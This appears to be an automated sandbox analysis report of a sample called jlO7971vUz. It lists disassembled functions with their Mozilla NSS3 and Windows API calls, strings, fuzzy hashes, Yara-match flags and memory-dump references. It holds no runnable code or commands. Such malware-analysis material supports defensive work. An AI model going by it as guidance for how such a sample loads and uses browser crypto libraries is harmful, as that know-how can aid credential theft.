Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 927b44329c78e73e57c0813632149af2806ff97324982d0b60568e23fe53f53d
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: F901C8B19042019FE6309F2AFC40BC7B7A5EF49319F004525E95D86B10E632F8168B96

Function 6C5E2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C5E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C5E5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5E2D9C

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

PR_EnterMonitor.NSS3(?), ref: 6C5E2DB2
PR_EnterMonitor.NSS3(?), ref: 6C5E2DCF
PR_ExitMonitor.NSS3(?), ref: 6C5E2DF2
PR_ExitMonitor.NSS3(?), ref: 6C5E2E0B

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: e5df9ca1dbdc335a47843b504bda2aa5e166b65edee10552040990c5abe13efd
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: B101C8B19042019FE7309E2AFC01BC7B7A5EF45319F000535E95D87B10E632F8158696

Function 6C57AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C563090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C57AE42), ref: 6C5630AA
Part of subcall function 6C563090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5630C7
Part of subcall function 6C563090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5630E5
Part of subcall function 6C563090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C563116
Part of subcall function 6C563090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C56312B
Part of subcall function 6C563090: PK11_DestroyObject.NSS3(?,?), ref: 6C563154
Part of subcall function 6C563090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C56317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C5599FF,?,?,?,?,?,?,?,?,?,6C552D6B,?), ref: 6C57AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C5599FF,?,?,?,?,?,?,?,?,?,6C552D6B,?), ref: 6C57AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C552D6B,?,?,00000000), ref: 6C57AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C552D6B,?,?,00000000), ref: 6C57AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C552D6B,?,?), ref: 6C57AEA3

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 7339a5b9e7b76343a1883e5f3e2edf40ccded95e9fe3cfecb664352cbbdb40fe
Instruction ID: e645ad26be6e73cc1351dfb1e3f90713cb3ee3bd4fcaa2c196e902037c699427
Opcode Fuzzy Hash: 7339a5b9e7b76343a1883e5f3e2edf40ccded95e9fe3cfecb664352cbbdb40fe
Instruction Fuzzy Hash: BC01A477B050109BE722916DAC85AAF31588BC765CF081832ED05D7B51F616DD8A43F3

Function 6C660930 Relevance: 7.5, APIs: 5, Instructions: 45fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,6C660C83), ref: 6C66094F
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C660C83), ref: 6C660974
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C660983
_PR_MD_UNLOCK.NSS3(?,?,6C660C83), ref: 6C66099F
OutputDebugStringA.KERNEL32(?,?,6C660C83), ref: 6C6609B2

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
String ID:
API String ID: 1872382454-0
Opcode ID: 5682c307f3746d05741e7f1f32562dd7f62a0df7dadaadefadf86fd5b00f1c1d
Instruction ID: 3fbe09b3439f15d761a2debda7681a98f3856dc134eed0a4f4d033717b447b63
Opcode Fuzzy Hash: 5682c307f3746d05741e7f1f32562dd7f62a0df7dadaadefadf86fd5b00f1c1d
Instruction Fuzzy Hash: 91015BB4701241AFDF10AF6EE8D5B553BB9AB43318F280215E44683652E636E461CA1E

Function 017F7170 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(013C03C8,?,?,?,017F074C,?,013C03C8,00000000), ref: 017F717C
lstrcpyn.KERNEL32(01A06310,013C03C8,013C03C8,?,017F074C,?,013C03C8), ref: 017F71A0
lstrlen.KERNEL32(?,?,017F074C,?,013C03C8), ref: 017F71B7
wsprintfA.USER32 ref: 017F71D7

Strings

%s%s, xrefs: 017F71C5

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 20288adaf93a1d64e839a2c5f4b4a2a6bd8cc552c3e9d4b0afe1d9a88aa1cf13
Instruction ID: 64d85d84ffb0ca07ad572169f0f72b74ff9eecf84de5b54bd85ecba3638455f7
Opcode Fuzzy Hash: 20288adaf93a1d64e839a2c5f4b4a2a6bd8cc552c3e9d4b0afe1d9a88aa1cf13
Instruction Fuzzy Hash: 3F01C879500108FFCB19DFA8D958AAE7BB9EB48345F108588F9098B345CB71AA51CB91

Function 6C66ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C66A6D8), ref: 6C66AE0D
free.MOZGLUE(?), ref: 6C66AE14
DeleteCriticalSection.KERNEL32(6C66A6D8), ref: 6C66AE36
free.MOZGLUE(?), ref: 6C66AE3D
free.MOZGLUE(00000000,00000000,?,?,6C66A6D8), ref: 6C66AE47

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 171d8f391694f6a4cce79e73e0d1f83b0b023be146e8e0a86fecbc53aa3c74f2
Instruction ID: 8873a73ecc224a4273cbac0441a60f2c4e44046c45fe821b7b5b144cbd81b041
Opcode Fuzzy Hash: 171d8f391694f6a4cce79e73e0d1f83b0b023be146e8e0a86fecbc53aa3c74f2
Instruction Fuzzy Hash: C3F0C87520160267CB009FE6A44891B7778BE45774B100328E12B83941D733F012D7D9

Function 017F9DC7 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 017F9DD3

Part of subcall function 017F934C: __getptd_noexit.LIBCMT ref: 017F934F
Part of subcall function 017F934C: __amsg_exit.LIBCMT ref: 017F935C

__getptd.LIBCMT ref: 017F9DEA
__amsg_exit.LIBCMT ref: 017F9DF8
__lock.LIBCMT ref: 017F9E08
__updatetlocinfoEx_nolock.LIBCMT ref: 017F9E1C

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: f9a99a99aba886ac733bedb6b078d753f3a1d5ad17996f4275ec12c529a2528f
Instruction ID: 10afc724616c754fb2d4dae29d83c57c64c0ccf6155a94dfc54e0de4ace08f2a
Opcode Fuzzy Hash: f9a99a99aba886ac733bedb6b078d753f3a1d5ad17996f4275ec12c529a2528f
Instruction Fuzzy Hash: 74F0B432945716DBEB72BF79980974FF690AF14B28F21420EF301A73D8CB6859808A56

Function 6C4E88D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,01DC7D83), ref: 6C4E8990

Strings

@zOl, xrefs: 6C4E8A31

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: memset
String ID: @zOl
API String ID: 2221118986-3503494174
Opcode ID: e45cb647dad74564aa4b6343f92b7b09b7b67e66bf65172eb1dfcd6a8b317928
Instruction ID: cd12c7f63670a27ef1ac88cf1d0978c353305311bb70437e48419dc06ee7fe49
Opcode Fuzzy Hash: e45cb647dad74564aa4b6343f92b7b09b7b67e66bf65172eb1dfcd6a8b317928
Instruction Fuzzy Hash: 4E51F671A057919FC704CF29C494AA6BBF0BF59308B25929EC8884BB03D331F596CBE1

Function 6C4E6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C4E6D36

Strings

%s at line %d of [%.10s], xrefs: 6C4E6D2F
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4E6D20
database corruption, xrefs: 6C4E6D2A

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: b2bfa8ce1e515e4e69bb09a3dc8580c564e3fbe064fdbb70e5be0c1407034623
Instruction ID: 082a0e8c916d8fa15d54a1c968641a6adff2e317d2bf924fe18a5ae810c6e4e2
Opcode Fuzzy Hash: b2bfa8ce1e515e4e69bb09a3dc8580c564e3fbe064fdbb70e5be0c1407034623
Instruction Fuzzy Hash: 3A21F4306043099BC710CF19D841F9AB7F2AF88319F55452CD9499BF51E771F9458B92

Function 6C5C2FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+\l,6C5C32C2,<+\l,00000000,00000000,?), ref: 6C5C2FDA

Part of subcall function 6C5B14C0: TlsGetValue.KERNEL32 ref: 6C5B14E0
Part of subcall function 6C5B14C0: EnterCriticalSection.KERNEL32 ref: 6C5B14F5
Part of subcall function 6C5B14C0: PR_Unlock.NSS3 ref: 6C5B150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C5C300B

Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B10F3
Part of subcall function 6C5B10C0: EnterCriticalSection.KERNEL32(?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B110C
Part of subcall function 6C5B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1141
Part of subcall function 6C5B10C0: PR_Unlock.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1182
Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C5C302A

Part of subcall function 6C5B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5B08B4

Part of subcall function 6C59C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C59C45D
Part of subcall function 6C59C3D0: TlsGetValue.KERNEL32 ref: 6C59C494
Part of subcall function 6C59C3D0: EnterCriticalSection.KERNEL32(?), ref: 6C59C4A9
Part of subcall function 6C59C3D0: PR_Unlock.NSS3(?), ref: 6C59C4F4

Strings

<+\l, xrefs: 6C5C2FD0

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+\l
API String ID: 2538134263-4255845935
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: c90c289da26b09d7cba33dad01f3c7222bbc9486a78d8117957aae01da8d39bf
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: 3F1194B7B00108ABDB408E659C01ADB7BD99B84668F184138E91CE7781E772ED15CBA1

Function 6C61CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C61CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C61CC7B), ref: 6C61CD7A
Part of subcall function 6C61CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C61CD8E
Part of subcall function 6C61CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C61CDA5
Part of subcall function 6C61CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C61CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C61CCB5
memcpy.VCRUNTIME140(6C6B14F4,6C6B02AC,00000090), ref: 6C61CCD3
memcpy.VCRUNTIME140(6C6B1588,6C6B02AC,00000090), ref: 6C61CD2B

Part of subcall function 6C539AC0: socket.WSOCK32(?,00000017,6C5399BE), ref: 6C539AE6
Part of subcall function 6C539AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C5399BE), ref: 6C539AFC

Part of subcall function 6C540590: closesocket.WSOCK32(6C539A8F,?,?,6C539A8F,00000000), ref: 6C540597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C61CCB0

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: a61e8b323d94494ef404321f259f566b1f870636d9b8789a90c2d0aa02a69848
Instruction ID: 017f5bb311c44b2b72214acaefb2837c54e2a51420345453f4520e7d4fcb767e
Opcode Fuzzy Hash: a61e8b323d94494ef404321f259f566b1f870636d9b8789a90c2d0aa02a69848
Instruction Fuzzy Hash: 6A1175F3A142407EDB009F5B9E867867BA89746318F141035E5069BF41E671D4248BDE

Function 6C4DA8E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6C60A480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C62C3A2,?,?,00000000,00000000), ref: 6C60A528
Part of subcall function 6C60A480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C60A6E0

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4DA94F

Strings

%s at line %d of [%.10s], xrefs: 6C4DA948
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4DA939
database corruption, xrefs: 6C4DA943

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 27026331a18252bbbd3bd6f67c840639c6d66e08819da6621804b8d803625b41
Instruction ID: ec6635b31e3e0d78c064f14f6edba29bdb07ea390953a42691e8a16ec508b82e
Opcode Fuzzy Hash: 27026331a18252bbbd3bd6f67c840639c6d66e08819da6621804b8d803625b41
Instruction Fuzzy Hash: A5012631B002089BC710DA7ADC11F5BB3F5AF89319F864869E94997B40D771BC098BA9

Function 6C568850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C570715), ref: 6C568859
PR_NewLock.NSS3 ref: 6C568874

Part of subcall function 6C6198D0: calloc.MOZGLUE(00000001,00000084,6C540936,00000001,?,6C54102C), ref: 6C6198E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C56888D

Strings

NSS, xrefs: 6C568887

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: 34570475b4bee751f3eebb3f344f7e873ef35f9044ae4cb34a460801e9ded919
Instruction ID: a67030e12f6d984821e553be461145f4e22dc3be0f9cd184432540f49e6d0184
Opcode Fuzzy Hash: 34570475b4bee751f3eebb3f344f7e873ef35f9044ae4cb34a460801e9ded919
Instruction Fuzzy Hash: B8F09676E8162073F750226A6C06F8665985F9275EF040432E90DA7F82EE52991983E7

Function 6C5FA890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,?,6C5E5F25,?,?,?,?,?,?,?,?,?,6C5EAAD4), ref: 6C5FA8A3

Part of subcall function 6C59ADC0: TlsGetValue.KERNEL32(?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE10
Part of subcall function 6C59ADC0: EnterCriticalSection.KERNEL32(?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE24
Part of subcall function 6C59ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C57D079,00000000,00000001), ref: 6C59AE5A
Part of subcall function 6C59ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE6F
Part of subcall function 6C59ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE7F
Part of subcall function 6C59ADC0: TlsGetValue.KERNEL32(?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AEB1
Part of subcall function 6C59ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AEC9

PK11_FreeSymKey.NSS3(?,00000000,?,6C5E5F25,?,?,?,?,?,?,?,?,?,6C5EAAD4), ref: 6C5FA8BA
SECITEM_ZfreeItem_Util.NSS3(%_^l,00000000,00000000,?,6C5E5F25,?,?,?,?,?,?,?,?,?,6C5EAAD4), ref: 6C5FA8CF

Strings

%_^l, xrefs: 6C5FA894, 6C5FA8CE

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
